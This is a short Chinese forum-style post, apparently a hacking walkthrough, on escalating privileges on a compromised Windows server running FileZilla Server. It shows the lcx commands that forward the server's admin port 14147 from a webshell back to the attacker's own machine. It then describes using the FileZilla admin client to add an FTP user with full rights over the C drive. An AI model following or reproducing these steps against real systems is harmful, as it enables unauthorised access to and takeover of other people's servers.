前段时间lengf牛写了篇文章关于FileZilla Server的提权测试，俺看了也觉得不错 这不今天刚好遇上一个FileZilla Server的服务器，咋试试提权。当然lengf牛的是在FileZilla Server的目录有可写权限修改配置文件的情况下。如果目录不可写是否没办法了呢，大家有没有想到G6FTP如何提权的， G6FTP是把本机管理端口转发到自己的机器然后远程连接ftp服务器的。

  

这个是我复制回来的 服务器的管理信息

下面看我今天的演示：

本机执行lcx监听

lcx2 -listen 51 2001

  

Webshell下上传lcx 转发

Lcx –slave 你的ip 端口 要转发的ip 要转发端口

然后回到本地查看

然后本地下载FileZilla Server 运行 然后连接本机的2001  因为我是把远程服务器的14147端口转发到本机的2001了 所以大家千万别误解

  

然后用户 添加av 目录c盘 权限选择所有

下面登录ftp看看